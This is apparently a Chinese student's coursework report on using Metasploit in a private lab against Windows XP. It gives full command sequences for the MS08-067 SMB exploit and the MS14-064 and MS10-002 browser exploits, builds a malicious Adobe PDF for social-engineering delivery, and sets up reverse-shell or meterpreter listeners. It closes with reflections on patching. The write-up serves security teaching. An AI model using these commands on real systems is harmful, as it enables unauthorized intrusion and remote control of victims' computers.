一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点掌握常用的三种攻击方式的思路。
二、实践过程
靶机:WindowsXP,关闭防火墙,IP地址为192.168.152.138
攻击机:IP地址为192.168.152.129
(一)主动攻击实践
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行
- 攻击机与靶机能够互相ping通。
- 攻击机使用指令 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.152.138 查看靶机的ms08_067漏洞是否存在。可以看到漏洞是存在的
- 打开msf,查看靶机445端口是否开放,可以看到445端口开放。
search portscan use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.152.138 exploit
- 对靶机进行攻击。可以看到回连成功,输入【ipconfig】验证。
use exploit/windows/smb/ms08_067_netapi set payload generic/shell_reverse_tcp set RHOST 192.168.152.138 set LHOST 192.168.152.129 exploit
(二)针对浏览器的攻击
1.MS14_064漏洞
MS14_064漏洞是Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。远程攻击者利用此漏洞构造的网址执行任意代码,能够影响Win95+IE3—Win10+IE11的全版本。
use exploit/windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp set SRVHOST 192.168.152.129 set AllowPowerShellPrompt 1 set LHOST 192.168.152.129 set LPORT 4309 set target 0 exploit
- 在XP系统中输入黄框内的URL。
- XP端完成打开网页后,在kali中【Ctrl+C】退出当前进程,输入 sessions ,可以看到当前建立了会话。
- 输入 sessions -i 1 获得第一个会话的链接,输入 ipconfig ,可以看到攻击成功。
2.MS10_002漏洞
本来以为可以做个不一样的结果做完发现之前已经有同学做了。MS10_002漏洞是针对微软Internet Explorer“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码。
- msf输入以下指令
use exploit/windows/browser/ms10_002_aurora set paylaod windows/meterpreter/reverse_tcp set srvhost 192.168.152.129 set lport 1211
- 靶机在IE浏览器输入框内的网址
- 在kali中【Ctrl+C】退出当前进程,输入 sessions ,可以看到当前建立的会话ID为3,输入 sessions -i 3 进入会话,即可回连成功。
(三)针对客户端的攻击
Adobe的攻击主要是通过社会工程学将文档发送给用户,打开文档就会触发恶意漏洞。
- 打开msf输入以下指令,这里因为我的学号4309端口不太行,所以在征得祝源同学的同意下借用了一下他的学号
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp set LHOST 192.168.152.129
set LPORT 4317 set FILENAME 20174309.pdf exploit
- 根据黄框内的路径将生成的PDF文件复制到XP系统内,输入以下指令进入监听:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.152.129 exploit
- 在靶机中用Adobe打开PDF文件,返回攻击端,输入 ipconfig 验证。可以看到回连成功。
(四)应用辅助模块(唯一)
本来以为辅助模块应该不是很难,但是发现太容易重复了。每找到一个想用的就去搜一下看最近一周有没有相关的博客,最后用的是【gather/brower_info】这个模块,是用来搜集浏览器信息的。(这应该是没有重复了吧)
- 输入 show options 发现只需要【SRVHOST】这一个设置。
- 在靶机的浏览器中输入红框内的URL。
- 从返回的结果中可以看到,① 浏览器允许JavaScript ② ua名称(不知道ua是个啥)是MSIE ③ ua的版本是6.0 ,还有flash版本、操作系统名称、语言等信息。
三、实践总结
(一)基础问题回答
1.用自己的话解释什么是exploit,payload,encode.
exploit是利用,即漏洞利用,利用漏洞对目标进行攻击。
payload是载荷,指进行攻击时攻击者想要执行的。
encode是编码,用来对恶意代码进行伪装消除坏字符等。
(二)总结与体会
这次的实验大部分是要用XP系统的漏洞,现在用XP系统的人已经不多了,新的系统基本上都会修补这些漏洞。如果我们平时及时下载补丁,修补漏洞,那么这个实验放在我们日常生活的环境中来进行应该也很难成功了。
(三)离实战还缺些什么技术或步骤
上个实验做了信息搜集与漏洞扫描,对不同的系统,漏洞不一样,系统打没打补丁不一样,设置的安全策略不一样,这就需要我们针对不同的系统不同的情境量身打造适合当前情景的漏洞,也就需要我们 ① 对靶机的漏洞进行综合分析 ② 设计合适的攻击方式。